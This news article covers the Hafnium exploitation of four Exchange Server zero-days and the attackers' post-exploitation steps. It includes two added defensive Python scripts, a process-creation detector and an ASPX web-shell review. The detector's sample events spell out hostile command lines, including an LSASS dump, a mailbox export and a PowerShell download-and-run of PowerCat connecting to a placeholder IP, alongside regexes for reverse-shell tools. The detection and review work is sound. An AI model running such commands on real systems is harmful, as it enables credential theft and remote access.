Microsoft Exchange Zero-Day Attackers Spy on American Targets!

Full dumps of email boxes, lateral movement & backdoors characterise sophisticated attacks by a Chinese APT – while other incidents spread rapidly.

Microsoft has discovered multiple zero-day exploits in the wild being used to attack on-premises versions of Microsoft Exchange Server.

Adversaries have been able to access email accounts, steal a raft of data, and drop malware on target machines for long-term remote access, according to the computing giant.

The attacks are “limited & targeted,” according to Microsoft, spurring it to release out-of-band patches this week. The exploited bugs are being tracked as CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 & CVE-2021-27065.

Compromising

However, other researchers have reported seeing the activity compromising many victim organisations.

“The team is seeing organisations of all shapes & sizes affected, including electricity companies, local/county governments, healthcare providers & banks/financial institutions, as well as small hotels, multiple senior citizen communities & other mid-market businesses,” a spokesperson at Huntress explained.

The culprit is believed to be an advanced persistent threat (APT) group known as Hafnium (named after a rare chemical element), which has a history of targeting assets in the US with cyber-espionage campaigns.

Microsoft Threat Intelligence Center

Targets historically have included defence contractors, infectious disease researchers, law firms, non-governmental organisations (NGOs), policy think tanks & universities.

“Microsoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to Hafnium, a group assessed to be state-sponsored & operating out of China, based on observed victimology, tactics & procedures,” according to an announcement this week from Microsoft on the attacks.

“The fact that Microsoft chose to patch these flaws out-of-band rather than include them as part of next week’s Patch Tuesday release leads us to believe the flaws are quite severe even if we don’t know the full scope of those attacks,” Satnam Narang, Staff Research Engineer at Tenable, suggested.

Patched Bugs

Microsoft patched the following bugs this week, & admins should update accordingly:

  • CVE-2021-26855 is a server-side request forgery (SSRF) vulnerability that allows authentication bypass: A remote attacker can simply send arbitrary HTTP requests to the Exchange server and be able to authenticate to it. From there, an attacker can steal the full contents of multiple user mailboxes.
  • CVE-2021-26857 is an insecure-deserialization vulnerability in the Unified Messaging service, where untrusted user-controllable data is deserialized by a program. An exploit allows remote attackers with administrator permissions to run code as SYSTEM on the Exchange server.
  • CVE-2021-26858 and CVE-2021-27065 are both post-authentication arbitrary file-write vulnerabilities in Exchange. Once authenticated with an Exchange server (using CVE-2021-26855 or with compromised admin credentials), an attacker could write a file to any path on the server – thus achieving remote code execution (RCE).

Researchers at Volexity originally uncovered the SSRF bug as part of an incident response & noted,

“This vulnerability is remotely exploitable & does not require authentication of any kind, nor does it require any special knowledge or access to a target environment. The attacker only needs to know the server running Exchange and the account from which they want to extract email.”

No Authentication Whatsoever

They also observed the SSRF bug being chained with CVE-2021-27065 to accomplish RCE in multiple attacks.

In addition to Volexity, Microsoft credited security researchers at Dubex with uncovering the recent activity, which was first observed in January.

“Based on what we know so far, exploitation of one of the 4 vulnerabilities requires no authentication whatsoever & can be used to potentially download messages from a targeted user’s mailbox,” observed Tenable’s Narang.

“The other vulnerabilities can be chained together by a determined threat actor to facilitate a further compromise of the targeted organisation’s network.”

Compromised Servers

In the observed campaigns, the 4 zero-day bugs were used to gain initial access to targeted Exchange servers & achieve RCE. Hafnium operators then deployed web shells on the compromised servers, which were used to steal data & expand the attack, according to researchers.

“In all cases of RCE, Volexity has observed the attacker writing web shells (ASPX files) to disk & conducting further operations to dump credentials, add user accounts, steal copies of the Active Directory database (NTDS.DIT) & move laterally to other systems & environments,” says Volexity’s writeup.

Post-Exploitation Activity

Following web shell deployment, Microsoft found that Hafnium operators performed this range of post-exploitation activity:

  • Using Procdump to dump the LSASS process memory;
  • Using 7-Zip to compress stolen data into ZIP files for exfiltration;
  • Adding and using Exchange PowerShell snap-ins to export mailbox data;
  • Using the Nishang Invoke-PowerShellTcpOneLine reverse shell;
  • And downloading PowerCat from GitHub, then using it to open a connection to a remote server.
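Each behaviour in the list above leaves a process-creation record, which makes it a natural target for detection rules. The following is an added example written for this article, not code from Microsoft or any of the researchers quoted: a small rule set run over constructed process-creation records in the style of EDR or Sysmon Event ID 1 data. The record layout, the hostname EXCH01 and every sample command line are assumptions of the example. It also adds one heuristic the article does not mention, the IIS worker process w3wp.exe spawning a command shell, which is the generic way web shell activity shows up in process telemetry.

```python
"""Process-creation detections for the Hafnium post-exploitation behaviours.

Added example, not code from the article, Microsoft or the researchers quoted.
The record layout (host, parent_image, image, command_line) and every sample
event below are constructed for this example; they do not come from any
incident. Rules match on EDR / Sysmon Event ID 1 style data."""
import ntpath
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    host: str
    parent_image: str   # full path of the parent process
    image: str          # full path of the new process
    command_line: str


# (rule name, parent-image regex, image regex, command-line regex); None = any.
RULES = [
    # Procdump used to dump LSASS memory.
    ("procdump_lsass", None, r"(?i)\\procdump(64)?\.exe$", r"(?i)lsass"),
    # 7-Zip adding ('a') or updating ('u') an archive: staging for exfiltration.
    ("7zip_staging", None, r"(?i)\\7z(a|g)?\.exe$", r"\s(a|u)\s"),
    # Exchange management snap-in loaded, or a mailbox export requested.
    ("exchange_snapin_export", None, r"(?i)\\powershell(_ise)?\.exe$",
     r"(?i)add-pssnapin\s+\S*microsoft\.exchange|new-mailboxexportrequest"),
    # Nishang Invoke-PowerShellTcpOneLine, by script name or by the TCP client
    # object it constructs (the name is absent when the one-liner is pasted).
    ("nishang_reverse_shell", None, None,
     r"(?i)invoke-powershelltcponeline|net\.sockets\.tcpclient"),
    # PowerCat fetched from GitHub and invoked from PowerShell.
    ("powercat_download", None, r"(?i)\\powershell(_ise)?\.exe$", r"(?i)powercat"),
    # Generic web-shell heuristic (this example's own addition): the IIS worker
    # process hosting OWA/ECP should never spawn a command shell.
    ("iis_worker_spawns_shell", r"(?i)\\w3wp\.exe$",
     r"(?i)\\(cmd|powershell|powershell_ise)\.exe$", None),
]


def evaluate(event: ProcEvent) -> list[str]:
    """Names of every rule whose non-None fields all match the event."""
    hits = []
    for name, parent_re, image_re, cmd_re in RULES:
        checks = ((parent_re, event.parent_image), (image_re, event.image),
                  (cmd_re, event.command_line))
        if all(p is None or re.search(p, value) for p, value in checks):
            hits.append(name)
    return hits


def scan(events) -> list[tuple[str, str, list[str]]]:
    """(host, process file name, rule hits) for each event that fired a rule."""
    return [(e.host, ntpath.basename(e.image), hits)
            for e in events if (hits := evaluate(e))]


# Constructed sample telemetry: six events that should fire, two that should not.
CMD = r"C:\Windows\System32\cmd.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcEvent("EXCH01", r"C:\Windows\System32\inetsrv\w3wp.exe", CMD, "cmd.exe /c whoami"),
    ProcEvent("EXCH01", CMD, r"C:\Windows\Temp\procdump64.exe",
              r"procdump64.exe -accepteula -ma lsass.exe C:\Windows\Temp\l.dmp"),
    ProcEvent("EXCH01", CMD, r"C:\Program Files\7-Zip\7z.exe",
              r"7z.exe a -tzip C:\Windows\Temp\out.zip C:\Windows\Temp\export"),
    ProcEvent("EXCH01", CMD, PS,
              'powershell.exe -c "Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn; '
              'New-MailboxExportRequest -Mailbox ceo -FilePath \\\\EXCH01\\C$\\Windows\\Temp\\ceo.pst"'),
    ProcEvent("EXCH01", CMD, PS,
              r"powershell.exe -nop -ep bypass -File C:\Windows\Temp\Invoke-PowerShellTcpOneLine.ps1"),
    ProcEvent("EXCH01", CMD, PS,
              "powershell.exe -nop -c \"IEX (New-Object Net.WebClient).DownloadString("
              "'https://github.com/EXAMPLE/powercat.ps1'); powercat -c 203.0.113.5 -p 443\""),
    # Benign activity that must not fire: an archive extraction and routine admin use.
    ProcEvent("EXCH01", r"C:\Windows\explorer.exe", r"C:\Program Files\7-Zip\7z.exe",
              r"7z.exe x C:\Backups\backup.zip -oC:\Restore"),
    ProcEvent("EXCH01", r"C:\Windows\System32\services.exe", PS,
              "powershell.exe -NoProfile -Command Get-Service"),
]


if __name__ == "__main__":
    for host, image, hits in scan(SAMPLE_EVENTS):
        print(f"{host}: {image} -> {', '.join(hits)}")
```

The rules are deliberately narrow (the 7-Zip rule only fires on archive creation, not extraction) so that routine administration on an Exchange host does not drown the signal; in production they would be fed from the EDR's own schema rather than the constructed `ProcEvent` records.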

Offline Address Book

The attackers were also able to download the Exchange offline address book from compromised systems, which contains information about an organisation & its users, according to the analysis.

“The good news for defenders is that the post-exploitation activity is very detectable,” said Katie Nickels, director of intelligence at Red Canary, adding that her firm has found many attacks as well. “Some of the activity we observed uses the China Chopper web shell, which has been around for more than 8 years, giving defenders ample time to develop detection logic for it.”

Hafnium APT

Hafnium has been tracked by Microsoft before, but the company has only just released a few details on the APT.

In terms of its tactics, “Hafnium has previously compromised victims by exploiting vulnerabilities in internet-facing servers, & has used legitimate open-source frameworks, like Covenant, for command & control,” according to Microsoft. “Once they’ve gained access to a victim network, HAFNIUM typically exfiltrates data to file sharing sites like MEGA.”

Hafnium operates primarily from leased virtual private servers in the United States, and primarily goes after US targets, but is linked to the Chinese government, according to Microsoft. It characterises the APT as “a highly skilled & sophisticated actor.”

More Attacks Soon

It should be noted that other researchers say they have seen these vulnerabilities being exploited by different threat actors targeting other regions, according to Narang.

“We expect other threat actors to begin leveraging these vulnerabilities in the coming days & weeks, which is why it is critically important for organisations that use Exchange Server to apply these patches immediately,” he added.

Indeed, researchers at Huntress explained they have discovered more than 100 web shells deployed across about 1,500 vulnerable servers (with antivirus & endpoint detection & response installed) & expect the number to increase.

Review their Systems

They are not alone.

“FireEye has observed these vulnerabilities being exploited in the wild & we are actively working with several impacted organisations,” Charles Carmakal, Senior VP & CTO at FireEye Mandiant observed. “In addition to patching as soon as possible, we recommend organisations also review their systems for evidence of exploitation that may have occurred prior to the deployment of the patches.”
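Mandiant's advice to review systems for exploitation that predates the patch, and Volexity's observation earlier in the article that the attackers wrote ASPX web shells to disk, both come down to the same check: which ASPX files in the web directories are not supposed to be there, or were changed after the server was last known clean. The following is an added example written for this article, not code from Volexity, Mandiant or Microsoft. It builds a temporary web root of constructed files, compares every .aspx file with a baseline of expected files and with a cut-off date, and reports the ones that fail either test. The directory names, file names, baseline and dates are all assumptions of the example.

```python
"""Review web directories for ASPX files that should not be there.

Added example, not code from the article, Volexity or Mandiant. It reviews a
web root the way a post-patch check would: every .aspx file is compared with
a baseline of expected files and with a cut-off date before which the server
is believed clean. The web root, file names, baseline and dates are all
constructed for this example."""
import os
import tempfile
from datetime import datetime, timezone
from pathlib import Path


def find_suspect_aspx(root, baseline, since):
    """Map relative path -> reasons for each .aspx file that is either absent
    from the baseline or modified at/after the cut-off."""
    root = Path(root)
    findings = {}
    for path in root.rglob("*.aspx"):
        rel = path.relative_to(root).as_posix()
        reasons = []
        if rel not in baseline:
            reasons.append("not_in_baseline")
        mtime = datetime.fromtimestamp(path.stat().st_mtime, tz=timezone.utc)
        if mtime >= since:
            reasons.append("modified_after_cutoff")
        if reasons:
            findings[rel] = reasons
    return dict(sorted(findings.items()))


# Constructed stand-in for the files an installation is expected to contain.
BASELINE = {"owa/auth/signin.aspx", "owa/auth/error.aspx", "ecp/auth/session.aspx"}
# Assumed cut-off: the server is taken to be clean before this date (the
# article says exploitation was first observed in January).
CUTOFF = datetime(2021, 1, 1, tzinfo=timezone.utc)
OLD = datetime(2020, 6, 1, tzinfo=timezone.utc).timestamp()
NEW = datetime(2021, 2, 15, tzinfo=timezone.utc).timestamp()


def build_sample_webroot(root):
    """Write constructed files with controlled modification times."""
    samples = [
        ("owa/auth/signin.aspx", OLD),          # expected, untouched
        ("owa/auth/error.aspx", OLD),           # expected, untouched
        ("ecp/auth/session.aspx", NEW),         # expected file, rewritten after cut-off
        ("owa/auth/zz_placeholder.aspx", NEW),  # unexpected file written after cut-off
        ("owa/auth/signin.css", NEW),           # not .aspx, ignored
    ]
    for rel, mtime in samples:
        path = Path(root, rel)
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_text("<%-- constructed placeholder --%>\n")
        os.utime(path, (mtime, mtime))


def run_demo():
    """Build the constructed web root in a temp directory and review it."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_webroot(root)
        return find_suspect_aspx(root, BASELINE, CUTOFF)


if __name__ == "__main__":
    for rel, reasons in run_demo().items():
        print(f"{rel}: {', '.join(reasons)}")
```

Two design points matter in practice: a baseline file that was rewritten is reported as well as an unknown file, because a file-write primitive lets an attacker overwrite a legitimate page rather than add a new one; and modification time is a hint rather than proof, since timestamps can be altered, so a hit should be confirmed against file content and the process telemetry that wrote it.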
